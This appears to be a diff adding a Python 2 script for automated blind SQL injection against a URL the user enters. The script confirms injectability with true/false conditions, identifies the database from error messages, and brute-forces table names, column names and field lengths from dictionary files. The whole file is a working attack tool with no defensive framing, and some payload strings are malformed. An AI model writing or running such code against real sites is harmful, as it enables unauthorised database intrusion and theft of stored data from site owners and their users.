1+ import requests
2+ from bs4 import BeautifulSoup
3+ from re import search
4+ import os
5+ import string
6+ import urllib
7+ use = raw_input ('Enter the URL for SQL injection:' )
8+ user = use
9+ def Webpage ():
10+ global header ,link
11+ url = "{}" .format (user )
12+ header = {'User-Agent' :'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36' }
13+ link = requests .get (url ,headers = header )
14+ if link .status_code == 200 :
15+ print ('URL stability can be linked.' )
16+ else :
17+ print ('URL link failure' )
18+ exit ()
19+ Webpage ()
20+ def start ():
21+ a = '%20and%201=1'
22+ b = '%20and%201=2'
23+ url = user
24+ urla = user + a
25+ urlb = user + b
26+ page = urllib .urlopen (url ).read ()
27+ pagea = urllib .urlopen (urla ).read ()
28+ pageb = urllib .urlopen (urlb ).read ()
29+ if page == pagea and page != pageb :
30+ print ('Existence of SQL injection !' )
31+ else :
32+ print ('SQL injection does not exist' )
33+ exit ()
34+ start ()
35+ def database ():
36+ print ('[!]Try to judge the type of the database' )
37+ db = ''
38+ sql = "" .join ('%20and20%user>0' )
39+ url = user
40+ pgex = urllib .urlopen (url + sql ).read ()
41+ if search ('ODBC Microsoft Access' ,pgex ) or search ('Microsoft JET Database' ,pgex ):
42+ print ('data base: Access' )
43+ return db
44+ elif search ('SQL Server' ,pgex ) or search ('nvarchar' ,pgex ):
45+ print ('database: MSSQL' )
46+ return db
47+ elif search ('You have an error in your SQL syntax' ,pgex ) or search ('Query failed' ,pgex ) or search ('SQL query failed' ,pgex ) or search ('mysql_fetch_' ,pgex ) or search ('mysql_num_rows' ,pgex ) or search ('The used SELECT statements have a different number of columns' ,pgex ) or search (" Warning: mysql_fetch_array():" ,pgex ):
48+ print ('data base: MYSQL' )
49+ return db
50+ else :
51+ print ('No database type is judged!' )
52+ exit ()
53+ database ()
54+ def stopwatch ():
55+ global tables
56+ liudao = []
57+ tables = open ('dict.txt' ,'r' ).read ().split ('\n ' )
58+ for b in tables :
59+ tablesurl = "%20and%20exists%20(select%20*%20from%20{})" .format (b )
60+ page = urllib .urlopen (user ).read ()
61+ pagex = urllib .urlopen (user + tablesurl ).read ()
62+ if page == pagex :
63+ liudao .append (tablesurl )
64+ else :
65+ pass
66+ if len (liudao )== 0 :
67+ print '[-]Unable to find table name'
68+ else :
69+ print '[+]Find the name of the table'
70+ for c in liudao :
71+ print user ,c
72+ stopwatch ()
73+ uii = raw_input ('Please specify a table:' )
74+ def filed (s ):
75+ shengdao = []
76+ fileds = open ('fileds.txt' ,'r' ).read ().split ('\n ' )
77+ for x in fileds :
78+ filedsurl = string .join (['%20and%20exists%20(select%20' ,x ,'%20from%20' ,s ,')' ],'' )
79+ page = urllib .urlopen (user ).read ()
80+ pagex = urllib .urlopen (user + filedsurl ).read ()
81+ if page == pagex :
82+ shengdao .append (filedsurl )
83+ else :
84+ pass
85+ if len (shengdao ) == 0 :
86+ print '[-]Unable to find fileds name'
87+ else :
88+ print '[+]Find the name the fileds'
89+ for f in shengdao :
90+ print user ,f
91+ filed (uii )
92+ luwei = raw_input ('Please enter the field name:' )
93+ def filedlen (gy ,djs ):
94+ diyudao = []
95+ fildens = open ('fileds.txt' ,'r' ).read ().split ('\n ' )
96+ for lu in fildens :
97+ payload = string .join (['%20and%201=(select%20count(*)%20from%20' ,gy ,'%20where%20len(' ,djs ,')>' ,lu ,')' ],"" )
98+ page = urllib .urlopen (user ).read ()
99+ pagex = urllib .urlopen (user + payload ).read ()
100+ if page == pagex :
101+ diyudao .append (payload )
102+ else :
103+ pass
104+ if len (diyudao ) == 0 :
105+ print '[-]Sorry to find out the length of field content'
106+ else :
107+ print '[+]Guessing the length of field content'
108+ for gy in diyudao :
109+ print user ,gy
110+ filedlen (uii ,luwei )